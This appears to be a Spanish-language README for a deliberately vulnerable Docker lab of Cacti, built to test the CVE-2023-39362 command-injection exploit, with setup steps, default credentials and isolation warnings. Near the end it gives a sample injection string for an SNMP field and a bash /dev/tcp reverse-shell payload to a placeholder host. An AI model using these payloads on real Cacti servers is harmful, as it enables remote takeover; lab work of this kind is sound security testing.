
ADVERTENCIA: Esta es una aplicación vulnerable para probar el exploit de la inyección de comandos de Cacti (CVE-2023-39362). ¡Ejecútela bajo su propio riesgo!
Esta es una aplicación vulnerable para probar el exploit de la vulnerabilidad Cacti (CVE-2023-39362).
¡Esta aplicación contiene vulnerabilidades de seguridad graves. Úsela bajo su propio riesgo! Se recomienda utilizar un entorno respaldado y aislado (como una máquina virtual con una instantánea reciente y redes solo anfitrión). No suba esta aplicación a ningún servidor expuesto a Internet, ya que se verán comprometidos.
DESCARGO DE RESPONSABILIDAD: No me hago responsable del uso que cualquier persona haga de esta aplicación. El único propósito de esta aplicación es ser un escenario de prueba para el exploit CVE-2023-39362 y no debe utilizarse con fines maliciosos. Si su servidor se ve comprometido mediante una instalación de esta aplicación, no es mi responsabilidad, sino de la(s) persona(s) que la subieron e instalaron.
Estos son los pasos para configurar el entorno:
docker compose up -d para iniciar la composición.admin/admin.admin.guest.guest para probar el exploit.El contenedor se llamará vuln-cacti.
El nombre de host para un dispositivo SNMP de prueba es monitored_snmp_device.
Para desmontar el entorno, use el comando docker compose down.
La guía de instalación oficial de Cacti se puede encontrar aquí.
Una causa raíz detallada de la vulnerabilidad está disponible en el aviso de seguridad original o en mi publicación de blog.
(Este es solo un posible exploit)
public\' ; touch /tmp/m3ssap0 ; \'./tmp la presencia del archivo creado.Para obtener una shell inversa, se puede usar un payload como el siguiente.
public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'
Este proyecto está licenciado bajo Unlicense - consulte el archivo LICENSE para obtener más detalles.